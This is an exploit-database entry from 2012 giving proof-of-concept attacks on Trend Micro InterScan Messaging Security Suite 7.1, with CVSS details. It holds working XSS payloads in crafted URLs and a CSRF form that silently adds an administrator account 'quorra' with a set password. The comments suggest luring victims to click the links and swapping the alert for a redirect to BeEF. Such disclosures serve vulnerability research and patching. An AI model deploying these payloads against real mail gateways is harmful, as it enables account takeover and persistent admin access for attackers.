Trend Micro InterScan Messaging Security Suite XSS / CSRF

2012.09.15
Credit: modpr0be
Risk: Low
Local: No
Remote: Yes


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF # Date: 13/09/2012 # Exploit Author: modpr0be (modpr0be[at]spentera.com) # Vendor Homepage: http://www.trendmicro.com # Software Link: http://www.trendmicro.com/ftp/products/interscan/IMSS_v7.1_Win_1394.zip # Version: 7.1-Build_Win32_1394 # Tested on: Windows 2003 Standard Edition, XAMPP 1.7.4 (Default Config) # CVE : CVE-2012-2995, CVE-2012-2996 # Software Description # TrendMicro Interscan Messaging Security is the industry’s most comprehensive # mail gateway security. Choose state-of-the-art software or a hybrid solution # with on-premise virtual appliance and optional cloud pre-filter that blocks # the vast majority of spam and malware outside your network. Plus our Data # Privacy and Encryption Module secure outbound data to ensure privacy and # regulatory compliance. # Vulnerability Overview # Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79) # and cross-site request forgery (CWE-352) vulnerabilities. # Proof of Concept # Persistent/Stored XSS # this POC will store defined URL to white list URL page. Each time we access to this page, the XSS word # will pop up to the user. You can change the alert message box to something nasty (e.g redirect to beef??) hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"><script>alert('XSS')</script> # Non-persistent/Reflected XSS # This is non-persistent XSS, you might lure target user to click this link :) hxxps://127.0.0.1/initUpdSchPage.imss?src="><script>alert('XSS')</script> # Cross-Site Request Forgery # This POC should be targeted to user with admin privilege # It will add admin user with user quorra, and password quorra.123 # Target victim must be authenticated when perform this POC <html> <body> <form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST"> <input type="hidden" name="enabled" value="on" /> <input type="hidden" name="authMethod" value="1" /> <input type="hidden" name="name" value="quorra" /> <input type="hidden" name="password" value="quorra.123" /> <input type="hidden" name="confirmPwd" value="quorra.123" /> <input type="hidden" name="tabAction" value="saveAuth" /> <input type="hidden" name="gotoTab" value="saveAll" /> <input type="submit" value="CSRF" /> </form> </body> </html> # References # http://www.spentera.com/advisories/2012/SPN-05-2012.html # http://www.kb.cert.org/vuls/id/471364 # http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html

References:

http://www.trendmicro.com/ftp/products/interscan/IMSS_v7.1_Win_1394.zip


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top